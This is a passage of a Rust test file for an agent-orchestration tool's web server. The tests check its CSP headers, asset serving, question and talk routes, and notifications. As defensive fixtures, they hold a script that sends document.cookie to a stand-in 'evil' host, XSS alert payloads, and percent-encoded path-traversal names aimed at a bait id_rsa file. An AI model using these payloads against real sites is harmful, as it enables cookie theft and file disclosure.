5239        std::fs::write(store.path_of(id), body.to_string()).expect("write the talk");
5240        store.get(id).expect("the seeded talk has to be readable");
5241        id.to_owned()
5242    }
5243
5244    #[tokio::test]
5245    async fn both_panel_routes_send_the_whole_policy_that_makes_agent_html_safe() {
5246        let fx = Fixture::start().await;
5247        let id = panel(
5248            &fx,
5249            "<h1>Merge?</h1><img src=\"diff.svg\">",
5250            &[("diff.svg", b"<svg xmlns='http://www.w3.org/2000/svg'/>")],
5251        );
5252
5253        for path in [
5254            format!("/api/questions/{id}/panel"),
5255            format!("/api/questions/{id}/asset/diff.svg"),
5256        ] {
5257            let res = fx.get(&path).await;
5258            assert_eq!(res.status, 200, "{path}: {}", res.body);
5259            // The whole string, not a substring. A weakened directive - an
5260            // `img-src *` that lets a panel beacon out to a remote host, a
5261            // `script-src` anything, a missing `form-action` that lets it post
5262            // the owner's decision to a third party - has to fail here, and a
5263            // `contains` assertion would let every one of those through.
5264            assert_eq!(
5265                res.header("content-security-policy"),
5266                Some(
5267                    "default-src 'none'; img-src 'self' data:; style-src 'unsafe-inline'; \
5268                     font-src data:; base-uri 'none'; form-action 'none'; \
5269                     frame-ancestors 'self'"
5270                ),
5271                "{path} is the only thing between a hostile panel and the tailnet"
5272            );
5273            assert_eq!(
5274                res.header("x-content-type-options"),
5275                Some("nosniff"),
5276                "{path}: a browser must not re-decide the type we sent"
5277            );
5278            assert_eq!(
5279                res.header("referrer-policy"),
5280                Some("no-referrer"),
5281                "{path}: a panel must not leak the question id off the machine"
5282            );
5283
5284            // The front end mounts the frame only after a `HEAD` says the
5285            // panel is there, so `HEAD` has to answer with the same status and
5286            // the same policy as `GET` - a preflight that came back without
5287            // the CSP would mean a frame mounted on an unverified promise.
5288            let pre = fx.head(&path).await;
5289            assert_eq!(pre.status, res.status, "{path}: HEAD must agree with GET");
5290            assert_eq!(
5291                pre.header("content-security-policy"),
5292                res.header("content-security-policy"),
5293                "{path}: the preflight carries the same policy"
5294            );
5295            assert_eq!(
5296                pre.header("content-type"),
5297                res.header("content-type"),
5298                "{path}: the preflight carries the same type"
5299            );
5300        }
5301    }
5302
5303    #[tokio::test]
5304    async fn a_panel_reaches_the_browser_byte_for_byte() {
5305        let fx = Fixture::start().await;
5306        // Markup a sanitiser would be tempted to touch: a stray `<`, a script
5307        // tag, an entity, and a multi-byte character. The sandbox is what makes
5308        // this safe, so nothing here may be rewritten on the way out - a
5309        // rewritten diff is a diff the owner cannot trust.
5310        let html = "<h1>Merge?</h1><p>a &lt; b — 変更</p><script>alert(1)</script>";
5311        let id = panel(&fx, html, &[]);
5312
5313        let res = fx.get(&format!("/api/questions/{id}/panel")).await;
5314
5315        assert_eq!(res.status, 200);
5316        assert_eq!(res.bytes, html.as_bytes(), "served verbatim, not sanitised");
5317        assert_eq!(res.header("content-type"), Some("text/html; charset=utf-8"));
5318        assert_eq!(
5319            res.header("content-disposition"),
5320            None,
5321            "the panel itself is rendered in the frame, not downloaded"
5322        );
5323    }
5324
5325    #[tokio::test]
5326    async fn an_svg_asset_is_a_download_and_a_png_is_not() {
5327        let fx = Fixture::start().await;
5328        let svg = b"<svg xmlns='http://www.w3.org/2000/svg'><script>alert(1)</script></svg>";
5329        let png = b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR".as_slice();
5330        let id = panel(
5331            &fx,
5332            "<img src=\"diff.svg\"><img src=\"shot.png\">",
5333            &[("diff.svg", svg), ("shot.png", png)],
5334        );
5335
5336        let as_svg = fx.get(&format!("/api/questions/{id}/asset/diff.svg")).await;
5337        let as_png = fx.get(&format!("/api/questions/{id}/asset/shot.png")).await;
5338
5339        assert_eq!(as_svg.status, 200);
5340        assert_eq!(as_svg.header("content-type"), Some("image/svg+xml"));
5341        // An SVG is XML that may carry script. Inside the panel it is an
5342        // `<img src>` and the script cannot run; opened at the top level it
5343        // would be a document on magi's own origin, so the browser is told to
5344        // download it instead of rendering it.
5345        assert_eq!(as_svg.header("content-disposition"), Some("attachment"));
5346
5347        assert_eq!(as_png.status, 200);
5348        assert_eq!(as_png.header("content-type"), Some("image/png"));
5349        assert_eq!(
5350            as_png.header("content-disposition"),
5351            None,
5352            "a raster image has no execution surface, so tapping it still shows it"
5353        );
5354        assert_eq!(as_png.bytes, png, "a binary asset survives the round trip");
5355    }
5356
5357    #[tokio::test]
5358    async fn an_html_asset_is_never_served_as_html() {
5359        let fx = Fixture::start().await;
5360        let id = panel(
5361            &fx,
5362            "<p>see the notes</p>",
5363            &[
5364                (
5365                    "notes.html",
5366                    b"<script>fetch('http://evil/'+document.cookie)</script>",
5367                ),
5368                ("hook.js", b"fetch('http://evil/')"),
5369                ("data.json", b"{}"),
5370                ("HEADLINE.TXT", b"plain"),
5371            ],
5372        );
5373
5374        for name in ["notes.html", "hook.js", "data.json"] {
5375            let res = fx.get(&format!("/api/questions/{id}/asset/{name}")).await;
5376            assert_eq!(res.status, 200, "{name}: {}", res.body);
5377            // Serving this as text/html would be a way to reach agent markup
5378            // at the top level of the operator's browser, outside the frame's
5379            // sandbox and outside its CSP - which is the whole thing the panel
5380            // design exists to prevent. Unlisted types are downloads.
5381            assert_eq!(
5382                res.header("content-type"),
5383                Some("application/octet-stream"),
5384                "{name} must not be a type the browser will execute or render"
5385            );
5386        }
5387        // The whitelist is matched case-insensitively, so an agent shouting the
5388        // extension still gets a readable file rather than a download.
5389        let txt = fx
5390            .get(&format!("/api/questions/{id}/asset/HEADLINE.TXT"))
5391            .await;
5392        assert_eq!(
5393            txt.header("content-type"),
5394            Some("text/plain; charset=utf-8")
5395        );
5396    }
5397
5398    #[tokio::test]
5399    async fn no_spelling_of_a_traversing_asset_name_reaches_the_filesystem() {
5400        let fx = Fixture::start().await;
5401        let id = panel(&fx, "<p>x</p>", &[("diff.svg", b"<svg/>")]);
5402        // Something outside the panel directory that a traversal would reach if
5403        // one got through, so a passing test is not merely "the file was
5404        // missing anyway".
5405        std::fs::write(fx.questions().root().join("id_rsa"), b"secret").expect("write the bait");
5406
5407        // Decoded before this server's handler sees them: axum percent-decodes
5408        // path parameters, so `name` arrives as `../id_rsa`, `..\id_rsa` and a
5409        // string with a NUL in it. All three look like ordinary single-segment
5410        // filenames to the router, so the router passes them through and
5411        // `valid_asset_name` is what refuses them - for the literal `..`, and
5412        // for `/`, `\` and NUL not being in the permitted character set.
5413        for encoded in [
5414            "%2e%2e%2fid_rsa",
5415            "..%2fid_rsa",
5416            "..%5cid_rsa",
5417            "%2e%2e%5cid_rsa",
5418            "diff%00.svg",
5419            "..",
5420            ".hidden",
5421            "%2e%2e%2f%2e%2e%2fid_rsa",
5422        ] {
5423            let res = fx
5424                .get(&format!("/api/questions/{id}/asset/{encoded}"))
5425                .await;
5426            assert_eq!(
5427                res.status, 400,
5428                "`{encoded}` has to be refused by name, not looked up: {}",
5429                res.body
5430            );
5431            assert!(res.json()["error"].is_string(), "{}", res.body);
5432        }
5433
5434        // Not decoded, and never this handler's problem: a real slash makes the
5435        // request one segment too long for `/api/questions/{id}/asset/{name}`,
5436        // so axum's router has no route to match and answers before any code
5437        // here runs. Asserted so that a future route with a wildcard segment
5438        // cannot quietly open this door.
5439        for literal in ["../id_rsa", "../../questions/id_rsa", "..%5c../id_rsa"] {
5440            let res = fx
5441                .get(&format!("/api/questions/{id}/asset/{literal}"))
5442                .await;
5443            assert_eq!(
5444                res.status, 404,
5445                "`{literal}` must not match the asset route at all: {}",
5446                res.body
5447            );
5448        }
5449    }
5450
5451    #[tokio::test]
5452    async fn a_missing_panel_and_an_unknown_asset_are_both_json_404s() {
5453        let fx = Fixture::start().await;
5454        let plain = ask(&fx, "Which backend?", &["SQLite"]);
5455        let with_panel = panel(&fx, "<p>x</p>", &[("diff.svg", b"<svg/>")]);
5456
5457        // A question nobody wrote a panel for. The client preflights with HEAD
5458        // and cannot see inside a sandboxed frame, so this must be a status and
5459        // not an empty page.
5460        let none = fx.get(&format!("/api/questions/{plain}/panel")).await;
5461        assert_eq!(none.status, 404, "{}", none.body);
5462        assert!(none.json()["error"].is_string(), "{}", none.body);
5463        assert_eq!(
5464            fx.head(&format!("/api/questions/{plain}/panel"))
5465                .await
5466                .status,
5467            404,
5468            "the preflight is the only way the client can learn this"
5469        );
5470
5471        // A name that is perfectly legal and simply is not there.
5472        let missing = fx
5473            .get(&format!("/api/questions/{with_panel}/asset/absent.png"))
5474            .await;
5475        assert_eq!(missing.status, 404, "{}", missing.body);
5476        assert!(missing.json()["error"].is_string(), "{}", missing.body);
5477
5478        // A question that does not exist at all, on both routes.
5479        assert_eq!(fx.get("/api/questions/nope/panel").await.status, 404);
5480        assert_eq!(
5481            fx.get("/api/questions/nope/asset/diff.svg").await.status,
5482            404
5483        );
5484    }
5485
5486    #[tokio::test]
5487    async fn a_run_with_an_open_question_reads_as_waiting() {
5488        let fx = Fixture::start().await;
5489        let run = "20260902-000000-beef".to_owned();
5490        write_run(&fx.runs(), &run, RunStatus::Implementing);
5491
5492        let before = fx.get("/api/runs").await.json();
5493        assert_eq!(before[0]["waiting"], false, "{before}");
5494
5495        let store = fx.questions();
5496        let mut q = Question::new(
5497            run.clone(),
5498            "implement".to_owned(),
5499            "impl-A".to_owned(),
5500            "Which backend?".to_owned(),
5501            String::new(),
5502            vec!["SQLite".to_owned()],
5503        );
5504        store.put(&mut q).expect("put");
5505
5506        let during = fx.get("/api/runs").await.json();
5507        assert_eq!(during[0]["waiting"], true, "{during}");
5508
5509        // Answered: the run is moving again, and the flag has to follow without
5510        // anything having rewritten run.json.
5511        q.answer(Answer::Choice("SQLite".to_owned()))
5512            .expect("answer");
5513        store.put(&mut q).expect("put");
5514        let after = fx.get("/api/runs").await.json();
5515        assert_eq!(after[0]["waiting"], false, "{after}");
5516    }
5517
5518    #[tokio::test]
5519    async fn an_open_question_is_listed_and_counted_by_health() {
5520        let fx = Fixture::start().await;
5521        assert_eq!(fx.get("/api/health").await.json()["questions_open"], 0);
5522
5523        let id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5524        let listed = fx.get("/api/questions").await.json();
5525        assert_eq!(listed.as_array().expect("array").len(), 1);
5526        assert_eq!(listed[0]["id"], id);
5527        assert_eq!(listed[0]["status"], "open");
5528        assert_eq!(listed[0]["choices"][1], "Redis");
5529        // The count is what makes the phone's indicator honest: it is the one
5530        // number meaning nothing will move until a human acts.
5531        assert_eq!(fx.get("/api/health").await.json()["questions_open"], 1);
5532    }
5533
5534    #[tokio::test]
5535    async fn answering_records_the_choice_and_a_second_answer_conflicts() {
5536        let fx = Fixture::start().await;
5537        let id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5538        let path = format!("/api/questions/{id}/answer");
5539
5540        let res = fx.post(&path, Some(r#"{"choice":"Redis"}"#)).await;
5541        assert_eq!(res.status, 200, "{}", res.body);
5542        let body = res.json();
5543        assert_eq!(body["status"], "answered");
5544        assert_eq!(body["answer"]["choice"], "Redis");
5545
5546        // Answered from the terminal in between the list and the tap: the UI
5547        // must be able to tell this from a bad request, so it can show the
5548        // recorded answer instead of an error.
5549        let again = fx.post(&path, Some(r#"{"choice":"SQLite"}"#)).await;
5550        assert_eq!(again.status, 409, "{}", again.body);
5551        assert_eq!(fx.get("/api/health").await.json()["questions_open"], 0);
5552    }
5553
5554    #[tokio::test]
5555    async fn saying_something_appends_a_turn_without_answering() {
5556        let fx = Fixture::start().await;
5557        let id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5558        let path = format!("/api/questions/{id}/say");
5559
5560        let res = fx
5561            .post(&path, Some(r#"{"body":"why not Postgres?"}"#))
5562            .await;
5563        assert_eq!(res.status, 200, "{}", res.body);
5564        let body = res.json();
5565        assert_eq!(body["status"], "open", "talking back is not a decision");
5566        assert_eq!(body["answer"], Value::Null);
5567        assert_eq!(body["thread"][0]["who"], "operator");
5568        assert_eq!(body["thread"][0]["body"], "why not Postgres?");
5569        assert_eq!(body["waiting_on_agent"], true);
5570        // Still open, still counted, still exactly one question.
5571        assert_eq!(fx.get("/api/health").await.json()["questions_open"], 1);
5572    }
5573
5574    #[tokio::test]
5575    async fn asking_back_clears_the_owner_count_until_the_agent_replies() {
5576        let fx = Fixture::start().await;
5577        let store = fx.questions();
5578        let id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5579        assert_eq!(
5580            fx.get("/api/health").await.json()["questions_needs_owner"],
5581            1
5582        );
5583
5584        // The owner asks back instead of deciding: the ask bar, the nav badge
5585        // and the title must stop naming this question, because there is
5586        // nothing to decide until the agent answers - `status` alone cannot
5587        // say that, which is the whole reason `questions_needs_owner` exists
5588        // alongside `questions_open`.
5589        let res = fx
5590            .post(
5591                &format!("/api/questions/{id}/say"),
5592                Some(r#"{"body":"why not Postgres?"}"#),
5593            )
5594            .await;
5595        assert_eq!(res.status, 200, "{}", res.body);
5596        assert_eq!(fx.get("/api/health").await.json()["questions_open"], 1);
5597        assert_eq!(
5598            fx.get("/api/health").await.json()["questions_needs_owner"],
5599            0,
5600            "waiting on the agent is not waiting on the owner"
5601        );
5602
5603        // `magi ask --thread` replying is what brings the owner count back -
5604        // the same event that would resume the CLI call blocked in `magi
5605        // ask`.
5606        let mut q = store.get(&id).expect("get");
5607        q.reply("because SQLite needs no server", vec!["SQLite".to_owned()])
5608            .expect("reply");
5609        store.put(&mut q).expect("put");
5610        assert_eq!(fx.get("/api/health").await.json()["questions_open"], 1);
5611        assert_eq!(
5612            fx.get("/api/health").await.json()["questions_needs_owner"],
5613            1,
5614            "the agent's reply is what should light the banner back up"
5615        );
5616    }
5617
5618    #[tokio::test]
5619    async fn saying_something_is_refused_when_empty_answered_or_abandoned() {
5620        let fx = Fixture::start().await;
5621        let store = fx.questions();
5622
5623        let empty_id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5624        let res = fx
5625            .post(
5626                &format!("/api/questions/{empty_id}/say"),
5627                Some(r#"{"body":"   "}"#),
5628            )
5629            .await;
5630        assert_eq!(res.status, 400, "{}", res.body);
5631
5632        let answered_id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5633        let mut answered = store.get(&answered_id).expect("get");
5634        answered
5635            .answer(Answer::Choice("SQLite".to_owned()))
5636            .expect("answer");
5637        store.put(&mut answered).expect("put");
5638        let res = fx
5639            .post(
5640                &format!("/api/questions/{answered_id}/say"),
5641                Some(r#"{"body":"still there?"}"#),
5642            )
5643            .await;
5644        assert_eq!(res.status, 409, "{}", res.body);
5645
5646        let abandoned_id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5647        let mut abandoned = store.get(&abandoned_id).expect("get");
5648        abandoned.abandon("timed out");
5649        store.put(&mut abandoned).expect("put");
5650        let res = fx
5651            .post(
5652                &format!("/api/questions/{abandoned_id}/say"),
5653                Some(r#"{"body":"still there?"}"#),
5654            )
5655            .await;
5656        assert_eq!(res.status, 409, "{}", res.body);
5657    }
5658
5659    #[tokio::test]
5660    async fn an_answer_the_question_does_not_offer_is_refused() {
5661        let fx = Fixture::start().await;
5662        let id = ask(&fx, "Which backend?", &["SQLite", "Redis"]);
5663        let path = format!("/api/questions/{id}/answer");
5664
5665        for body in [
5666            r#"{"choice":"Postgres"}"#,
5667            r#"{"text":"whatever you think"}"#,
5668            r#"{"choice":"Redis","text":"both"}"#,
5669            r#"{}"#,
5670        ] {
5671            let res = fx.post(&path, Some(body)).await;
5672            assert_eq!(res.status, 400, "{body} should be refused: {}", res.body);
5673            assert!(res.json()["error"].is_string(), "{}", res.body);
5674        }
5675        // Nothing above may have answered it.
5676        assert_eq!(fx.get("/api/health").await.json()["questions_open"], 1);
5677    }
5678
5679    #[tokio::test]
5680    async fn a_free_text_question_takes_text_and_not_a_choice() {
5681        let fx = Fixture::start().await;
5682        let id = ask(&fx, "What should the flag be called?", &[]);
5683        let path = format!("/api/questions/{id}/answer");
5684
5685        assert_eq!(
5686            fx.post(&path, Some(r#"{"choice":"--json"}"#)).await.status,
5687            400
5688        );
5689        let res = fx.post(&path, Some(r#"{"text":"--json"}"#)).await;
5690        assert_eq!(res.status, 200, "{}", res.body);
5691        assert_eq!(res.json()["answer"]["text"], "--json");
5692    }
5693
5694    #[tokio::test]
5695    async fn an_unknown_question_is_a_json_404() {
5696        let fx = Fixture::start().await;
5697        let res = fx
5698            .post("/api/questions/nope/answer", Some(r#"{"text":"x"}"#))
5699            .await;
5700        assert_eq!(res.status, 404, "{}", res.body);
5701        assert!(res.json()["error"].is_string());
5702    }
5703
5704    #[tokio::test]
5705    async fn notifications_list_read_dismiss_and_health_agree() {
5706        let fx = Fixture::start().await;
5707        let store = Notices::at(fx.home.path().join("notifications"));
5708        assert_eq!(fx.get("/api/notifications").await.json()["unread"], 0);
5709        let rev0 = fx.get("/api/health").await.json()["notifications_rev"].clone();
5710
5711        let a = store.raise(Notice::warn("task:1", "held")).unwrap();
5712        let b = store.raise(Notice::error("run:2", "blocked")).unwrap();
5713
5714        let health = fx.get("/api/health").await.json();
5715        assert_eq!(health["notifications_unread"], 2);
5716        assert_ne!(
5717            health["notifications_rev"], rev0,
5718            "the badge must move live"
5719        );
5720
5721        let listed = fx.get("/api/notifications").await.json();
5722        assert_eq!(listed["unread"], 2);
5723        assert_eq!(listed["items"].as_array().unwrap().len(), 2);
5724        assert_eq!(listed["items"][0]["severity"], "error", "newest first");
5725
5726        let read = fx
5727            .post(&format!("/api/notifications/{}/read", a.id), None)
5728            .await;
5729        assert_eq!(read.status, 200, "{}", read.body);
5730        assert_eq!(fx.get("/api/notifications").await.json()["unread"], 1);
5731
5732        let gone = fx
5733            .post(&format!("/api/notifications/{}/dismiss", b.id), None)
5734            .await;
5735        assert_eq!(gone.status, 200, "{}", gone.body);
5736        let listed = fx.get("/api/notifications").await.json();
5737        assert_eq!(listed["items"].as_array().unwrap().len(), 1);
5738        assert_eq!(listed["unread"], 0);
5739
5740        store.raise(Notice::info("x", "again")).unwrap();
5741        let all = fx.post("/api/notifications/read-all", None).await;
5742        assert_eq!(all.status, 200, "{}", all.body);
5743        assert_eq!(all.json()["marked"], 1);
5744        assert_eq!(
5745            fx.get("/api/health").await.json()["notifications_unread"],
5746            0
5747        );
5748
5749        let missing = fx.post("/api/notifications/nope/read", None).await;
5750        assert_eq!(missing.status, 404, "{}", missing.body);
5751        assert!(missing.json()["error"].is_string());
5752    }
5753
5754    /// New work reaches the queue through `magi task add`, a standing talk's
5755    /// `magi task add --solo`, or the CLI - never a raw `POST /api/queue` -
5756    /// so the compose form and that route are gone. The tests that covered
5757    /// that route's validation went with it, and nothing was left asserting
5758    /// it stays gone — so a re-added handler would silently let the phone
5759    /// file briefs no one validated.
5760    #[tokio::test]
5761    async fn a_task_cannot_be_filed_over_the_phone_directly() {
5762        let f = Fixture::start().await;
5763
5764        let res = f
5765            .post(
5766                "/api/queue",
5767                Some(r#"{"instruction":"Add a --json flag to magi list"}"#),
5768            )
5769            .await;
5770
5771        assert_eq!(
5772            res.status, 405,
5773            "POST /api/queue must not be a route: {}",
5774            res.body
5775        );
5776        assert!(
5777            f.queue().list().is_empty(),
5778            "a task filed by a route that does not exist must not reach the disk"
5779        );
5780        // The path itself is still served — the Queue view reads it — and the
5781        // per-task controls are untouched by the entry being removed.
5782        assert_eq!(f.get("/api/queue").await.status, 200);
5783    }
5784
5785    /// `<repo>/host/owner/repo/.git`, the ghq layout [`repos::scan`] expects.
5786    fn make_checkout(root: &FsPath, host: &str, owner: &str, repo: &str) {
5787        std::fs::create_dir_all(root.join(host).join(owner).join(repo).join(".git"))
5788            .expect("checkout dir");
5789    }
5790
5791    #[tokio::test]
5792    async fn repos_list_returns_name_and_path_for_every_configured_root() {
5793        let tmp = TempDir::new().expect("tempdir");
5794        let repo = tmp.path().join("repo");
5795        std::fs::create_dir_all(&repo).expect("repo dir");
5796        let root = tmp.path().join("root");
5797        make_checkout(&root, "github.com", "yukimemi", "magi");
5798        std::fs::write(
5799            repo.join("magi.toml"),
5800            format!(
5801                "[repos]\nroots = [{:?}]\n",
5802                root.to_string_lossy().into_owned()
5803            ),
5804        )
5805        .expect("write magi.toml");
5806
5807        let f = Fixture::with_repo(repo).await;
5808        let res = f.get("/api/repos").await;
5809        assert_eq!(res.status, 200, "{}", res.body);
5810        let list = res.json();
5811        let repos = list.as_array().expect("an array");
5812        assert_eq!(repos.len(), 1);
5813        assert_eq!(repos[0]["name"], "yukimemi/magi");
5814        assert!(
5815            repos[0]["path"]
5816                .as_str()
5817                .is_some_and(|p| p.ends_with("magi") || p.contains("magi")),
5818            "{list}"
5819        );
5820    }
5821
5822    #[tokio::test]
5823    async fn repos_list_only_rescans_within_the_ttl_when_asked_to() {
5824        let tmp = TempDir::new().expect("tempdir");
5825        let repo = tmp.path().join("repo");
5826        std::fs::create_dir_all(&repo).expect("repo dir");
5827        let root = tmp.path().join("root");
5828        make_checkout(&root, "github.com", "yukimemi", "magi");
5829        std::fs::write(
5830            repo.join("magi.toml"),
5831            format!(
5832                "[repos]\nroots = [{:?}]\nscan_ttl = 3600\n",
5833                root.to_string_lossy().into_owned()
5834            ),
5835        )
5836        .expect("write magi.toml");
5837
5838        let f = Fixture::with_repo(repo).await;
5839        let first = f.get("/api/repos").await;
5840        assert_eq!(first.json().as_array().map(Vec::len), Some(1));
5841
5842        // A second checkout appears; within the TTL the cached answer must
5843        // not notice it.
5844        make_checkout(&root, "github.com", "yukimemi", "rvpm");
5845        let second = f.get("/api/repos").await;
5846        assert_eq!(
5847            second.json().as_array().map(Vec::len),
5848            Some(1),
5849            "a fresh cache must not rescan inside the TTL"
5850        );
5851
5852        let refreshed = f.get("/api/repos?refresh=1").await;
5853        assert_eq!(
5854            refreshed.json().as_array().map(Vec::len),
5855            Some(2),
5856            "an explicit refresh must rescan even inside the TTL"
5857        );
5858    }
5859
5860    /// A `kind = "command"` agent that ignores its prompt and answers a fixed
5861    /// string, declared straight in a repository's own `magi.toml` rather
5862    /// than the operator's real roster. No real agent CLI is spawned - `sh`
5863    /// is the interpreter, the same as `talk::tests::mock_agent` uses - so
5864    /// this is safe to run over a real HTTP round trip.
5865    const MOCK_AGENT_TOML: &str = "[[agents]]\nid = \"mock\"\nkind = \"command\"\ncommand = [\"sh\", \"-c\", \"cat >/dev/null && printf ok\"]\n";
5866
5867    /// A repo carrying `MOCK_AGENT_TOML`, for the talk routes that need a
5868    /// real `Config::discover` to find an agent - `talk::begin` resolves one
5869    /// even though it takes no turn, and `talk_say` invokes one.
5870    async fn talk_fixture() -> (TempDir, PathBuf, Fixture) {
5871        let tmp = TempDir::new().expect("tempdir");
5872        let repo = tmp.path().join("repo");
5873        std::fs::create_dir_all(&repo).expect("repo dir");
5874        std::fs::write(repo.join("magi.toml"), MOCK_AGENT_TOML).expect("write magi.toml");
5875        let f = Fixture::with_repo(repo.clone()).await;
5876        (tmp, repo, f)
5877    }
5878
5879    #[tokio::test]
5880    async fn posting_a_talk_with_no_body_opens_one_and_takes_no_turn() {
5881        let (_tmp, _repo, f) = talk_fixture().await;
5882
5883        // No body at all - `f.post(.., None)` sends no `Content-Type` either -
5884        // is the ordinary way a phone opens a talk.
5885        let opened = f.post("/api/talks", None).await;
5886        assert_eq!(opened.status, 201, "{}", opened.body);
5887        let body = opened.json();
5888        assert_eq!(body["status"], "open");
5889        assert_eq!(
5890            body["turns"].as_array().unwrap().len(),
5891            0,
5892            "opening takes no agent turn: there is nothing yet to answer"
5893        );
5894
5895        // An explicit empty object is the same request as none at all.
5896        let also_opened = f.post("/api/talks", Some("{}")).await;
5897        assert_eq!(also_opened.status, 201, "{}", also_opened.body);
5898
5899        let listed = f.get("/api/talks").await.json();
5900        assert_eq!(listed.as_array().unwrap().len(), 2);
5901    }
5902
5903    #[tokio::test]
5904    async fn talk_detail_lists_the_tasks_it_has_filed_and_stays_open() {
5905        let f = Fixture::start().await;
5906        let talk_id = seed_talk(&f, "20260904-014455-ab12", "open");
5907        let queue = f.queue();
5908        let mut mine = Task::new(
5909            "rename the loader".to_owned(),
5910            "rename the loader".to_owned(),
5911            PathBuf::from("/repo/magi"),
5912            Source::Agent {
5913                run: talk_id.clone(),
5914                node: "chat".to_owned(),
5915            },
5916        );
5917        queue.put(&mut mine).expect("file the task");
5918        let mut theirs = Task::new(
5919            "unrelated".to_owned(),
5920            "unrelated".to_owned(),
5921            PathBuf::from("/repo/magi"),
5922            Source::Human,
5923        );
5924        queue.put(&mut theirs).expect("file the task");
5925
5926        let res = f.get(&format!("/api/talks/{talk_id}")).await;
5927        assert_eq!(res.status, 200, "{}", res.body);
5928        let body = res.json();
5929        assert_eq!(
5930            body["status"], "open",
5931            "filing a task does not close a talk"
5932        );
5933        let tasks = body["tasks"].as_array().expect("tasks array");
5934        assert_eq!(tasks.len(), 1, "only this talk's own task is listed");
5935        assert_eq!(tasks[0]["id"], mine.id);
5936    }
5937
5938    #[tokio::test]
5939    async fn talk_say_records_the_operators_turn_before_the_agents_reply_lands() {
5940        let (_tmp, _repo, f) = talk_fixture().await;
5941        let id = f.post("/api/talks", None).await.json()["id"]
5942            .as_str()
5943            .expect("id")
5944            .to_owned();
5945
5946        let res = f
5947            .post(
5948                &format!("/api/talks/{id}/say"),
5949                Some(r#"{"text":"what does the queue module do?"}"#),
5950            )
5951            .await;
5952        assert_eq!(res.status, 202, "{}", res.body);
5953        let queued = res.json();
5954        let turns = queued["turns"].as_array().expect("turns array");
5955        assert_eq!(
5956            turns.len(),
5957            1,
5958            "the answer reflects only what is on disk the instant it is sent, \
5959             before the agent's turn - which can run for the whole of \
5960             `[graph] timeout_talk` - has a chance to land: {queued}"
5961        );
5962        assert_eq!(turns[0]["who"], "operator");
5963        assert_eq!(turns[0]["body"], "what does the queue module do?");
5964        assert_eq!(
5965            queued["thinking"], true,
5966            "the accepted response exposes the background turn claim: {queued}"
5967        );
5968
5969        let mut turns_after = 1;
5970        for _ in 0..SETTLE_STEPS {
5971            let detail = f.get(&format!("/api/talks/{id}")).await.json();
5972            turns_after = detail["turns"].as_array().expect("turns array").len();
5973            if turns_after == 2 {
5974                break;
5975            }
5976            tokio::time::sleep(Duration::from_millis(10)).await;
5977        }
5978        assert_eq!(turns_after, 2, "the agent's reply eventually lands");
5979    }
5980
5981    /// A phone that reloads mid-request drops `talk_say`'s whole handler
5982    /// future without warning - see `TalkTurnGuard`'s doc. The bug this
5983    /// guards against: `talk::record` used to return, and only *then* did the
5984    /// handler make a second, separate disk round trip before spawning the
5985    /// agent's reply task. A future dropped in that gap left a message
5986    /// recorded on disk with no reply task ever started and no way back short
5987    /// of a fresh message - and the gap was not even the whole story: *any*
5988    /// `.await` in this handler, including the very first one, is a point
5989    /// where a drop can land after the awaited work already finished but
5990    /// before this handler's own code resumes to act on it. `record` now
5991    /// runs inside the task `tokio::spawn` hands to the runtime before this
5992    /// handler ever awaits anything of its own again, so there is nothing
5993    /// left in *this* handler's future for a disconnect to interrupt between
5994    /// the message landing on disk and the reply task starting.
5995    ///
5996    /// A real socket disconnect cannot be relied on to land in the old gap
5997    /// from a test - over loopback, `talk_say` typically finishes before the
5998    /// kernel even reports the peer gone. `JoinHandle::abort` reproduces the
5999    /// same failure mode directly: it drops the task's future at whatever
6000    /// point it has reached, exactly what axum does to the handler future,
6001    /// without needing to win a real network race. Sweeping the delay before
6002    /// aborting samples a range of points the task's execution can be at,
6003    /// including where the old code sat waiting on its second disk round
6004    /// trip - confirmed by reverting this fix locally and watching this same
6005    /// sweep catch a talk stuck with the operator's turn recorded and no
6006    /// reply ever following.
6007    #[tokio::test]
6008    async fn a_dropped_handler_future_after_recording_still_gets_an_agent_reply() {
6009        let tmp = TempDir::new().expect("tempdir");
6010        let repo = tmp.path().join("repo");
6011        std::fs::create_dir_all(&repo).expect("repo dir");
6012        std::fs::write(repo.join("magi.toml"), MOCK_AGENT_TOML).expect("write magi.toml");
6013        let home = TempDir::new().expect("temp home");
6014        let talks = Talks::at(home.path().join("talks"));
6015        let ui = Arc::new(
6016            Ui::new(
6017                Queue::at(home.path().join("queue")),
6018                Questions::at(home.path().join("questions")),
6019                talks.clone(),
6020                home.path().join("runs"),
6021                home.path().to_path_buf(),
6022                repo.clone(),
6023            )
6024            .with_worktrees_root(home.path().join("wt")),
6025        );
6026        let cfg = config_for(&repo).await.expect("discover config");
6027
6028        for delay in 0..40u32 {
6029            let talk = talk::begin(&talks, &cfg, repo.clone(), None).expect("begin talk");
6030            let id = talk.id.clone();
6031
6032            let handler = tokio::spawn(talk_say(
6033                State(Arc::clone(&ui)),
6034                Path(id.clone()),
6035                Ok(Json(NewTalkTurn {
6036                    text: "what does the queue module do?".to_owned(),
6037                    attachments: Vec::new(),
6038                })),
6039            ));
6040            tokio::time::sleep(Duration::from_micros(u64::from(delay) * 500)).await;
6041            handler.abort();
6042            // Wait out the abort so the next iteration's talk does not race
6043            // this one's still-unwinding turn guard.
6044            let _ = handler.await;
6045
6046            let mut turns = 0;
6047            for _ in 0..SETTLE_STEPS {
6048                if let Ok(fresh) = talks.get(&id) {
6049                    turns = fresh.turns.len();
6050                    if turns != 1 {
6051                        break;
6052                    }
6053                }
6054                tokio::time::sleep(Duration::from_millis(10)).await;
6055            }
6056            assert_ne!(
6057                turns, 1,
6058                "delay {delay}: talk {id} recorded the operator's turn but \
6059                 the agent never answered - the reply task was never \
6060                 started after the handler future was dropped"
6061            );
6062        }
6063    }
6064
6065    /// The same drop, landing on `talk_say`'s other durable write.
6066    ///
6067    /// When a turn is already running, the busy branch persists the
6068    /// operator's text as a queued draft and then reclaims the turn slot if
6069    /// the holder gave it up in the meantime - and whoever reclaims owes that
6070    /// draft a `drain_loop`. `blocking` runs its closure on `spawn_blocking`,
6071    /// which finishes whether or not the future awaiting it is still there,
6072    /// so a handler dropped at that `.await` used to leave the draft written
